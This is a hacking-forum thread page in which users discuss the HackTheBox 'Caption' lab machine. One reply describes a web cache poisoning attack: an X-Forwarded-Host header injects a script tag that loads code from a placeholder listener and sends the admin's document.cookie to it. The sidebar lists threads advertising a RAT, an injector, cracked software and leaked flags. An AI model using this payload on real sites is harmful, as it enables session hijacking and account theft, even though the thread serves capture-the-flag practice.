Jan 12, 2025, 02:57 AM
|
HTB Caption - Linux - Hard
by mhsoraa - Saturday September 14, 2024 at 06:31 PM
|
|
Jan 24, 2025, 10:20 PM
(Jan 12, 2025, 02:57 AM)BlackBeer Wrote:(Nov 29, 2024, 05:34 PM)cutearmadillo Wrote: You use cache poisoning to insert malicious javascript into the page I'm not sure if i can atm, cause im at work and using a VM. but I sent the request when i first traversed to the /Firewalls page to repeater in burp and set up a listener: python3 -m http.server {listenerport} then sent ``` X-Forwarded-Host: 127.0.0.1"> </script> <script src="http://LOCALIP:LPORT/exploit.js"></script> <!-- ``` with the script containing ``` X-Forwarded-Host: 127.0.0.1"> </script> <script>new Image().src="http://LOCALIP:LPORT/?c="+encodeURI(document.cookie);</script><!-- ``` Then waited for my listener to catch the admin's cookie via the .js script that had been placed in the webcache Hope this helps, ping me later if it doesnt and i'll see if i can do any more |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 44 | 3,520 |
28 minutes ago Last Post: mus1c0 |
||
| [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot | 98 | 8,980 |
5 hours ago Last Post: Zacker90 |
||
| SVCHOST Injector 2026 | 0 | 74 |
11 hours ago Last Post: opsecmaster67 |
||
| Cold Seal 5.6 cracked Sensitive information can be exposed or stolen | 0 | 62 |
11 hours ago Last Post: opsecmaster67 |
||
| EagleRAT v2.5 Create backdoor access points | 0 | 57 |
11 hours ago Last Post: opsecmaster67 |
||